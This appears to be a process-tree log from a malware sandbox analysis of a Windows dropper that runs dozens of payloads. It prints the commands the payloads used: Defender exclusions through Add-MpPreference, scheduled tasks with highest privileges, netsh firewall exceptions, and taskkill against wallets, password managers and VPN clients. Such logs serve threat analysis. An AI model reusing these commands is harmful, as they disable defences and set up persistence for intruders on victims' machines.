  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3456,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2984 /prefetch:8
  2⤵
  PID:5148
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    PID:5656
  - - C:\Users\Admin\Desktop\Files\SteamDetector.exe
      "C:\Users\Admin\Desktop\Files\SteamDetector.exe"
      4⤵
      PID:5608
    - - C:\Users\Admin\AppData\Roaming\SteamDetector.exe
        
        "C:\Users\Admin\AppData\Roaming\SteamDetector.exe"
        5⤵
        
        PID:6344
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6736
  - - C:\Users\Admin\Desktop\Files\CrSpoofer.exe
      "C:\Users\Admin\Desktop\Files\CrSpoofer.exe"
      4⤵
      PID:424
  - - C:\Users\Admin\Desktop\Files\test.exe
      "C:\Users\Admin\Desktop\Files\test.exe"
      4⤵
      PID:2484
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DJae4NdWG01p.bat" "
        5⤵
        
        PID:9612
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:10000
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4688
      - C:\Users\Admin\Desktop\Files\test.exe
        
        "C:\Users\Admin\Desktop\Files\test.exe"
        6⤵
        
        PID:6720
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5440,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
  2⤵
  PID:7144

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb7dda3cb8,0x7ffb7dda3cc8,0x7ffb7dda3cd8
  2⤵
  PID:1156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1844 /prefetch:2
  2⤵
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
  2⤵
  PID:2832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2396 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4124 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:2720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,5838633412350385887,9827649969358548545,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:2996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:444

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4476
- C:\Users\Admin\Desktop\Files\foggy-mountains.exe
  "C:\Users\Admin\Desktop\Files\foggy-mountains.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4472
- C:\Users\Admin\Desktop\Files\Obfuscated.exe
  "C:\Users\Admin\Desktop\Files\Obfuscated.exe"
  2⤵
  - Executes dropped EXE
  PID:664
- - C:\Users\Admin\Desktop\Files\Obfuscated.exe
    "C:\Users\Admin\Desktop\Files\Obfuscated.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1368
- C:\Users\Admin\Desktop\Files\logon.exe
  "C:\Users\Admin\Desktop\Files\logon.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:736
- C:\Users\Admin\Desktop\Files\c1.exe
  "C:\Users\Admin\Desktop\Files\c1.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of SetWindowsHookEx
  PID:1272
- C:\Users\Admin\Desktop\Files\Monitor.exe
  "C:\Users\Admin\Desktop\Files\Monitor.exe"
  2⤵
  - Executes dropped EXE
  PID:1400
- C:\Users\Admin\Desktop\Files\Client.exe
  "C:\Users\Admin\Desktop\Files\Client.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2096
- C:\Users\Admin\Desktop\Files\XClient.exe
  "C:\Users\Admin\Desktop\Files\XClient.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Terraria-Multiplayer-Fix-Online.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2612
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Terraria-Multiplayer-Fix-Online" /tr "C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4392
- C:\Users\Admin\Desktop\Files\Complexo%20v4.exe
  "C:\Users\Admin\Desktop\Files\Complexo%20v4.exe"
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Users\Admin\Desktop\Files\svchost.exe
  "C:\Users\Admin\Desktop\Files\svchost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  PID:1900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2892
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1200
- C:\Users\Admin\Desktop\Files\TCP.exe
  "C:\Users\Admin\Desktop\Files\TCP.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4888
- C:\Users\Admin\Desktop\Files\Server.exe
  "C:\Users\Admin\Desktop\Files\Server.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:1304
- C:\Users\Admin\Desktop\Files\Microsoft_Hardware_Launch.exe
  "C:\Users\Admin\Desktop\Files\Microsoft_Hardware_Launch.exe"
  2⤵
  PID:5584
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\Microsoft_Hardware_Launch.exe" "Microsoft_Hardware_Launch.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:5752
- C:\Users\Admin\Desktop\Files\AsyncClient.exe
  "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
  2⤵
  PID:5692
- C:\Users\Admin\Desktop\Files\Loader.exe
  "C:\Users\Admin\Desktop\Files\Loader.exe"
  2⤵
  PID:3560
- C:\Users\Admin\Desktop\Files\process-injection.exe
  "C:\Users\Admin\Desktop\Files\process-injection.exe"
  2⤵
  PID:5560
- C:\Users\Admin\Desktop\Files\jrockekcurje.exe
  "C:\Users\Admin\Desktop\Files\jrockekcurje.exe"
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\jrockekcurje.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5676
- C:\Users\Admin\Desktop\Files\ewm.exe
  "C:\Users\Admin\Desktop\Files\ewm.exe"
  2⤵
  PID:6572
- C:\Users\Admin\Desktop\Files\Excel-http.exe
  "C:\Users\Admin\Desktop\Files\Excel-http.exe"
  2⤵
  PID:6100
- C:\Users\Admin\Desktop\Files\Krishna33.exe
  "C:\Users\Admin\Desktop\Files\Krishna33.exe"
  2⤵
  PID:7592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr '"C:\Users\Admin\AppData\Roaming\chrome.exe"' & exit
    3⤵
    PID:7248
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr '"C:\Users\Admin\AppData\Roaming\chrome.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp491E.tmp.bat""
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5924
  - - C:\Users\Admin\AppData\Roaming\chrome.exe
      "C:\Users\Admin\AppData\Roaming\chrome.exe"
      4⤵
      PID:5992
- C:\Users\Admin\Desktop\Files\connector1.exe
  "C:\Users\Admin\Desktop\Files\connector1.exe"
  2⤵
  PID:7220
- C:\Users\Admin\Desktop\Files\image%20logger.exe
  "C:\Users\Admin\Desktop\Files\image%20logger.exe"
  2⤵
  PID:5396
- C:\Users\Admin\Desktop\Files\access.exe
  "C:\Users\Admin\Desktop\Files\access.exe"
  2⤵
  PID:8888
- C:\Users\Admin\Desktop\Files\jet.exe
  "C:\Users\Admin\Desktop\Files\jet.exe"
  2⤵
  PID:9160
- C:\Users\Admin\Desktop\Files\CleanerV2.exe
  "C:\Users\Admin\Desktop\Files\CleanerV2.exe"
  2⤵
  PID:9532
- C:\Users\Admin\Desktop\Files\bot2.exe
  "C:\Users\Admin\Desktop\Files\bot2.exe"
  2⤵
  PID:10148
- - C:\Users\Admin\Desktop\Files\bot2.exe
    "C:\Users\Admin\Desktop\Files\bot2.exe"
    3⤵
    PID:5188
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM ArmoryQt.exe
      4⤵
      Kills process with taskkill
      PID:6580
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM "Atomic Wallet.exe"
      4⤵
      Kills process with taskkill
      PID:7924
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM bytecoin-gui.exe
      4⤵
      Kills process with taskkill
      PID:9092
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Coinomi.exe
      4⤵
      Kills process with taskkill
      PID:5528
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Element.exe
      4⤵
      Kills process with taskkill
      PID:9748
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Exodus.exe
      4⤵
      Kills process with taskkill
      PID:7328
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Guarda.exe
      4⤵
      Kills process with taskkill
      PID:9124
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM KeePassXC.exe
      4⤵
      Kills process with taskkill
      PID:2480
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM NordVPN.exe
      4⤵
      Kills process with taskkill
      PID:9236
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM OpenVPNConnect.exe
      4⤵
      Kills process with taskkill
      PID:5348
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM seamonkey.exe
      4⤵
      Kills process with taskkill
      PID:7208
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Signal.exe
      4⤵
      Kills process with taskkill
      PID:9944
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM filezilla.exe
      4⤵
      Kills process with taskkill
      PID:6300
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM filezilla-server-gui.exe
      4⤵
      Kills process with taskkill
      PID:9956
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM keepassxc-proxy.exe
      4⤵
      Kills process with taskkill
      PID:9120
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM nordvpn-service.exe
      4⤵
      Kills process with taskkill
      PID:7924
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM steam.exe
      4⤵
      Kills process with taskkill
      PID:5312
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM walletd.exe
      4⤵
      Kills process with taskkill
      PID:8616
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM waterfox.exe
      4⤵
      Kills process with taskkill
      PID:9776
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Discord.exe
      4⤵
      Kills process with taskkill
      PID:8768
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM burp.exe
      4⤵
      Kills process with taskkill
      PID:9692
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM Ethereal.exe
      4⤵
      Kills process with taskkill
      PID:9688
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM EtherApe.exe
      4⤵
      Kills process with taskkill
      PID:10204
- C:\Users\Admin\Desktop\Files\mimilove.exe
  "C:\Users\Admin\Desktop\Files\mimilove.exe"
  2⤵
  PID:8960

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:2892

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1468

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
- Executes dropped EXE
PID:2888

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:2824

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004C0
1⤵
PID:1580

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
PID:5980

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:5972

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3348 -ip 3348
1⤵
PID:5132

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:5520
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5272

C:\Users\Admin\Desktop\Files\AA_v3.exe
"C:\Users\Admin\Desktop\Files\AA_v3.exe" -service -lunch
1⤵
PID:6196
- C:\Users\Admin\Desktop\Files\AA_v3.exe
  "C:\Users\Admin\Desktop\Files\AA_v3.exe"
  2⤵
  PID:6216

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
PID:6868

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5964

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
PID:5932

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:6452

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:6204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:8172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb91bbcc40,0x7ffb91bbcc4c,0x7ffb91bbcc58
  2⤵
  PID:1420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:7484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb91bbcc40,0x7ffb91bbcc4c,0x7ffb91bbcc58
  2⤵
  PID:1192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=1796 /prefetch:2
  2⤵
  PID:6116
- C:\Program Files\Google\Chrome\Application\chrome.exe
